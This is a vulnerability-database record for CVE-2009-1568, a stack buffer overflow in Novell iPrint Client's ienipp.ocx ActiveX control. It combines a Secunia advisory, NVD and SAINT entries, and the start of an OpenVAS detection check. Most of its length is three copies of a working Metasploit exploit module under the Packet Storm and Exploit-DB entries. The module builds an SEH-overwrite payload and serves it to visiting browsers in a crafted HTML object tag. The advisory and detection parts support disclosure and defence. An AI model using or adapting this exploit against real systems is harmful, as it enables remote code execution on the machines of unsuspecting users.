### Background

Novell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named **ienipp.ocx**.

### Problem

A buffer overflow in **ienipp.ocx** allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter.
{"enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2016-10-03T15:01:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1568"]}, {"type": "exploitdb", "idList": ["EDB-ID:16523"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:85993", "PACKETSTORM:86591"]}, {"type": "saint", "idList": ["SAINT:7129981AE8D7D97AF5751954062566D3", "SAINT:CED464C320FB37AD3E8A72FAC1DB68DD"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10447", "SECURITYVULNS:DOC:22874"]}, {"type": "nessus", "idList": ["NOVELL_IPRINT_532.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:900728", "OPENVAS:1361412562310900728", "OPENVAS:900729", "OPENVAS:1361412562310900729"]}, {"type": "seebug", "idList": ["SSV:15060"]}], "modified": "2016-10-03T15:01:58", "rev": 2}, "vulnersScore": 9.3}, "reporter": "SAINT Corporation", "id": "SAINT:DC7242B4E001383B596631DCD787D66F", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2010-01-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "modified": "2010-01-12T00:00:00", "references": [], "cvelist": ["CVE-2009-1568"], "description": "Added: 01/12/2010 \nCVE: [CVE-2009-1568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568>) \nBID: [37242](<http://www.securityfocus.com/bid/37242>) \nOSVDB: [60803](<http://www.osvdb.org/60803>) \n\n\n### Background\n\nNovell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named `**ienipp.ocx**`. \n\n### Problem\n\nA buffer overflow in `**ienipp.ocx**` allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter. \n\n### Resolution\n\nUpgrade to [iPrint Client version 5.3.2](<http://download.novell.com/Download?buildid=29T3EFRky18~>) or higher. 
\n\n### References\n\n<http://secunia.com/secunia_research/2009-40/> \n\n\n### Limitations\n\nExploit works on Novell iPrint Client 5.30.00. \n\n### Platforms\n\nWindows XP \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/novell_iprint_ienipp_target_frame", "lastseen": "2016-10-03T15:01:58", "edition": 1, "title": "Novell iPrint Client ienipp.ocx target-frame buffer overflow"}
{"cve": [{"lastseen": "2021-02-02T05:40:01", "description": "Stack-based buffer overflow in ienipp.ocx in Novell iPrint Client 5.30, and possibly other versions before 5.32, allows remote attackers to execute arbitrary code via a long target-frame parameter.", "edition": 4, "cvss3": {}, "published": "2009-12-08T23:30:00", "title": "CVE-2009-1568", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1568"], "modified": "2018-10-10T19:37:00", "cpe": ["cpe:/a:novell:iprint_client:5.30", "cpe:/a:novell:iprint_client:5.31"], "id": "CVE-2009-1568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1568", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:novell:iprint_client:5.30:*:*:*:*:*:*:*", "cpe:2.3:a:novell:iprint_client:5.31:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "description": "Added: 01/12/2010 \nCVE: [CVE-2009-1568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568>) \nBID: [37242](<http://www.securityfocus.com/bid/37242>) \nOSVDB: [60803](<http://www.osvdb.org/60803>) \n\n\n### Background\n\nNovell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named `**ienipp.ocx**`. 
\n\n### Problem\n\nA buffer overflow in `**ienipp.ocx**` allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter. \n\n### Resolution\n\nUpgrade to [iPrint Client version 5.3.2](<http://download.novell.com/Download?buildid=29T3EFRky18~>) or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2009-40/> \n\n\n### Limitations\n\nExploit works on Novell iPrint Client 5.30.00. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2010-01-12T00:00:00", "published": "2010-01-12T00:00:00", "id": "SAINT:CED464C320FB37AD3E8A72FAC1DB68DD", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/novell_iprint_ienipp_target_frame", "title": "Novell iPrint Client ienipp.ocx target-frame buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "edition": 2, "description": "Added: 01/12/2010 \nCVE: [CVE-2009-1568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568>) \nBID: [37242](<http://www.securityfocus.com/bid/37242>) \nOSVDB: [60803](<http://www.osvdb.org/60803>) \n\n\n### Background\n\nNovell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named `**ienipp.ocx**`. \n\n### Problem\n\nA buffer overflow in `**ienipp.ocx**` allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter. \n\n### Resolution\n\nUpgrade to [iPrint Client version 5.3.2](<http://download.novell.com/Download?buildid=29T3EFRky18~>) or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2009-40/> \n\n\n### Limitations\n\nExploit works on Novell iPrint Client 5.30.00. 
\n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2010-01-12T00:00:00", "published": "2010-01-12T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/novell_iprint_ienipp_target_frame", "id": "SAINT:7129981AE8D7D97AF5751954062566D3", "type": "saint", "title": "Novell iPrint Client ienipp.ocx target-frame buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:04", "description": "", "published": "2010-02-24T00:00:00", "type": "packetstorm", "title": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "modified": "2010-02-24T00:00:00", "id": "PACKETSTORM:86591", "href": "https://packetstormsecurity.com/files/86591/Novell-iPrint-Client-ActiveX-Control-target-frame-Buffer-Overflow.html", "sourceData": "`## \n# $Id: novelliprint_target_frame.rb 8605 2010-02-23 18:06:35Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell iPrint Client 5.30. When \npassing an overly long string via the \"target-frame\" parameter to ienipp.ocx \nan attacker can execute arbitrary code. \n \nNOTE: The \"operation\" variable must be set to a valid command in order to reach this \nvulnerability. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 8605 $', \n'References' => \n[ \n[ 'CVE', '2009-1568' ], \n[ 'BID', '37242' ], \n[ 'OSVDB', '60803' ], \n[ 'URL', 'http://secunia.com/advisories/37169/' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1456, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30 \n], \n'DisclosureDate' => 'Dec 08 2009', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \nsploit = p.encoded \n \n# the following must be an invalid pointer (unreadable) \nsploit << [rand(0xffffffff) | 0xc0000000].pack('V') \n \nsploit << generate_seh_record(target.ret) \n \ndistance = 8 + 4 + payload_space \nsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \nsploit << rand_text_alphanumeric(2048 - sploit.length) \n \noperations = [ \n\"op-client-interface-version\", \n\"op-client-version-info\", \n\"op-client-is-printer-installed\", \n\"op-user-get-role\", \n\"op-printer-install\", \n\"op-printer-remove\", \n\"op-printer-get-status\", \n\"op-printer-get-info\", \n\"op-printer-pause\", \n\"op-printer-resume\", \n\"op-printer-purge-jobs\", \n\"op-printer-list-users-jobs\", \n\"op-printer-list-all-jobs\", \n\"op-printer-send-test-page\", \n\"op-printer-send-file\", \n\"op-printer-setup-install\", \n\"op-job-get-info\", \n\"op-job-hold\", \n\"op-job-release-hold\", \n\"op-job-cancel\", \n\"op-job-restart\", \n\"op-dbg-printer-get-all-attrs\", \n\"op-dbg-job-get-all-attrs\" \n] \noperation = operations[rand(operations.length)] \n \n# escape single quotes \nsploit = xml_encode(sploit) \n \ncontent = %Q|<html> \n<object 
classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'> \n<param name='operation' value='#{operation}' /> \n<param name='target-frame' value='#{sploit}' /> \n</object> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \ndef xml_encode(str) \nret = \"\" \nstr.unpack('C*').each { |ch| \ncase ch \nwhen 0x41..0x5a, 0x61..0x7a, 0x30..0x39 \nret << ch.chr \nelse \nret << \"&#x\" \nret << ch.chr.unpack('H*')[0] \nret << \";\" \nend \n} \nret \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/86591/novelliprint_target_frame.rb.txt"}, {"lastseen": "2016-12-05T22:19:31", "description": "", "published": "2010-02-06T00:00:00", "type": "packetstorm", "title": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "modified": "2010-02-06T00:00:00", "id": "PACKETSTORM:85993", "href": "https://packetstormsecurity.com/files/85993/Novell-iPrint-Client-ActiveX-Control-target-frame-Buffer-Overflow.html", "sourceData": "`## \n# $Id: novelliprint_target-frame.rb 8338 2010-02-01 03:33:38Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell iPrint Client 5.30. When \npassing an overly long string via the \"target-frame\" parameter to ienipp.ocx \nan attacker can execute arbitrary code. \n \nNOTE: The \"operation\" variable must be set to a valid command in order to reach this \nvulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 8338 $', \n'References' => \n[ \n[ 'CVE', '2009-1568' ], \n[ 'BID', '37242' ], \n[ 'OSVDB', '60803' ], \n[ 'URL', 'http://secunia.com/advisories/37169/' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1456, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30 \n], \n'DisclosureDate' => 'Dec 08 2009', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. 
\nreturn if ((p = regenerate_payload(cli)) == nil) \n \nsploit = p.encoded \n \n# the following must be an invalid pointer (unreadable) \nsploit << [rand(0xffffffff) | 0xc0000000].pack('V') \n \nsploit << generate_seh_record(target.ret) \n \ndistance = 8 + 4 + payload_space \nsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \nsploit << rand_text_alphanumeric(2048 - sploit.length) \n \noperations = [ \n\"op-client-interface-version\", \n\"op-client-version-info\", \n\"op-client-is-printer-installed\", \n\"op-user-get-role\", \n\"op-printer-install\", \n\"op-printer-remove\", \n\"op-printer-get-status\", \n\"op-printer-get-info\", \n\"op-printer-pause\", \n\"op-printer-resume\", \n\"op-printer-purge-jobs\", \n\"op-printer-list-users-jobs\", \n\"op-printer-list-all-jobs\", \n\"op-printer-send-test-page\", \n\"op-printer-send-file\", \n\"op-printer-setup-install\", \n\"op-job-get-info\", \n\"op-job-hold\", \n\"op-job-release-hold\", \n\"op-job-cancel\", \n\"op-job-restart\", \n\"op-dbg-printer-get-all-attrs\", \n\"op-dbg-job-get-all-attrs\" \n] \noperation = operations[rand(operations.length)] \n \n# escape single quotes \nsploit = xml_encode(sploit) \n \ncontent = %Q|<html> \n<object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'> \n<param name='operation' value='#{operation}' /> \n<param name='target-frame' value='#{sploit}' /> \n</object> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \ndef xml_encode(str) \nret = \"\" \nstr.unpack('C*').each { |ch| \ncase ch \nwhen 0x41..0x5a, 0x61..0x7a, 0x30..0x39 \nret << ch.chr \nelse \nret << \"&#x\" \nret << ch.chr.unpack('H*')[0] \nret << \";\" \nend \n} \nret \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/85993/novelliprint_target-frame.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T00:03:34", "description": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow. CVE-2009-1568. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16523", "href": "https://www.exploit-db.com/exploits/16523/", "sourceData": "##\r\n# $Id: novelliprint_target_frame.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. 
When\r\n\t\t\t\tpassing an overly long string via the \"target-frame\" parameter to ienipp.ocx\r\n\t\t\t\tan attacker can execute arbitrary code.\r\n\r\n\t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\r\n\t\t\t\tvulnerability.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-1568' ],\r\n\t\t\t\t\t[ 'BID', '37242' ],\r\n\t\t\t\t\t[ 'OSVDB', '60803' ],\r\n\t\t\t\t\t[ 'URL', 'http://secunia.com/advisories/37169/' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1456,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 08 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tsploit = p.encoded\r\n\r\n\t\t# the following must be an invalid pointer (unreadable)\r\n\t\tsploit << [rand(0xffffffff) | 0xc0000000].pack('V')\r\n\r\n\t\tsploit << generate_seh_record(target.ret)\r\n\r\n\t\tdistance = 8 + 4 + payload_space\r\n\t\tsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\r\n\t\tsploit << rand_text_alphanumeric(2048 - sploit.length)\r\n\r\n\t\toperations = 
[\r\n\t\t\t\"op-client-interface-version\",\r\n\t\t\t\"op-client-version-info\",\r\n\t\t\t\"op-client-is-printer-installed\",\r\n\t\t\t\"op-user-get-role\",\r\n\t\t\t\"op-printer-install\",\r\n\t\t\t\"op-printer-remove\",\r\n\t\t\t\"op-printer-get-status\",\r\n\t\t\t\"op-printer-get-info\",\r\n\t\t\t\"op-printer-pause\",\r\n\t\t\t\"op-printer-resume\",\r\n\t\t\t\"op-printer-purge-jobs\",\r\n\t\t\t\"op-printer-list-users-jobs\",\r\n\t\t\t\"op-printer-list-all-jobs\",\r\n\t\t\t\"op-printer-send-test-page\",\r\n\t\t\t\"op-printer-send-file\",\r\n\t\t\t\"op-printer-setup-install\",\r\n\t\t\t\"op-job-get-info\",\r\n\t\t\t\"op-job-hold\",\r\n\t\t\t\"op-job-release-hold\",\r\n\t\t\t\"op-job-cancel\",\r\n\t\t\t\"op-job-restart\",\r\n\t\t\t\"op-dbg-printer-get-all-attrs\",\r\n\t\t\t\"op-dbg-job-get-all-attrs\"\r\n\t\t]\r\n\t\toperation = operations[rand(operations.length)]\r\n\r\n\t\t# escape single quotes\r\n\t\tsploit = xml_encode(sploit)\r\n\r\n\t\tcontent = %Q|<html>\r\n<object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'>\r\n<param name='operation' value='#{operation}' />\r\n<param name='target-frame' value='#{sploit}' />\r\n</object>\r\n</html>\r\n|\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef xml_encode(str)\r\n\t\tret = \"\"\r\n\t\tstr.unpack('C*').each { |ch|\r\n\t\t\tcase ch\r\n\t\t\twhen 0x41..0x5a, 0x61..0x7a, 0x30..0x39\r\n\t\t\t\tret << ch.chr\r\n\t\t\telse\r\n\t\t\t\tret << \"&#x\"\r\n\t\t\t\tret << ch.chr.unpack('H*')[0]\r\n\t\t\t\tret << \";\"\r\n\t\t\tend\r\n\t\t}\r\n\t\tret\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16523/"}], "securityvulns": [{"lastseen": 
"2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1568"], "description": "====================================================================== \r\n\r\n Secunia Research 08/12/2009\r\n\r\n - Novell iPrint Client "target-frame" Parameter Buffer Overflow -\r\n\r\n====================================================================== \r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nVendor's Description of Software.....................................3\r\nDescription of Vulnerability.........................................4\r\nSolution.............................................................5\r\nTime Table...........................................................6\r\nCredits..............................................................7\r\nReferences...........................................................8\r\nAbout Secunia........................................................9\r\nVerification........................................................10\r\n\r\n====================================================================== \r\n1) Affected Software \r\n\r\n* Novell iPrint Client 5.30\r\n\r\nNOTE: Other versions may also be affected.\r\n\r\n====================================================================== \r\n2) Severity \r\n\r\nRating: Highly critical\r\nImpact: System compromise\r\nWhere: Remote\r\n\r\n====================================================================== \r\n3) Vendor's Description of Software \r\n\r\n"Novell iPrint extends print services securely across multiple \r\nnetworks and operating systems. 
Using proven Internet technologies, \r\niPrint transforms your Novell Distributed Print Services\u2122 (NDPS\u00ae) \r\nprinters into Net-enabled printers, making all your printing resources\r\ninstantly accessible with a Web browser and a few mouse clicks".\r\n\r\nProduct Link:\r\nhttp://www.novell.com/products/openenterpriseserver/iprint.html\r\n\r\n====================================================================== \r\n4) Description of Vulnerability\r\n\r\nSecunia Research has discovered a vulnerability in Novell iPrint \r\nClient, which can be exploited by malicious people to compromise a\r\nuser's system.\r\n\r\nThe vulnerability is caused by a boundary error in ienipp.ocx when \r\nparsing the "target-frame" parameter and can be exploited to cause a\r\nstack-based buffer overflow via an overly long parameter value.\r\n\r\nSuccessful exploitation allows execution of arbitrary code when a user\r\ne.g. views a malicious web page.\r\n\r\n====================================================================== \r\n5) Solution \r\n\r\nUpdate to version 5.32.\r\n\r\n====================================================================== \r\n6) Time Table \r\n\r\n02/11/2009 - Vendor notified.\r\n03/11/2009 - Vendor response.\r\n08/12/2009 - Public disclosure.\r\n\r\n====================================================================== \r\n7) Credits \r\n\r\nDiscovered by Carsten Eiram, Secunia Research.\r\n\r\n====================================================================== \r\n8) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned \r\nCVE-2009-1568 for the vulnerability.\r\n\r\n====================================================================== \r\n9) About Secunia\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia 
also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private \r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the \r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n====================================================================== \r\n10) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2009-40/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================", "edition": 1, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "SECURITYVULNS:DOC:22874", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22874", "title": "Secunia Research: Novell iPrint Client "target-frame" Parameter Buffer Overflow", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "Buffer overflows in ActiveX.", "edition": 1, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "SECURITYVULNS:VULN:10447", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10447", "title": "Novell iPrint Client multiple security vulnerabilities", 
"type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:14:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.", "modified": "2017-01-27T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:900728", "href": "http://plugins.openvas.org/nasl.php?oid=900728", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_novell_iprint_client_mult_bof_vuln_lin.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation lets the remote attacker have a control over\n the remote system registers allowing execution of malformed shellcode.\n Impact Level: System\";\ntag_affected = \"Novell iPrint Client version prior to 5.32\";\ntag_insight = \"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application\n context.\";\ntag_solution = \"Upgrade Novell iPrint Client version to 5.32\n http://download.novell.com\";\ntag_summary = \"This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900728);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\");\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_lin.nasl\");\n script_require_keys(\"Novell/iPrint/Client/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n 
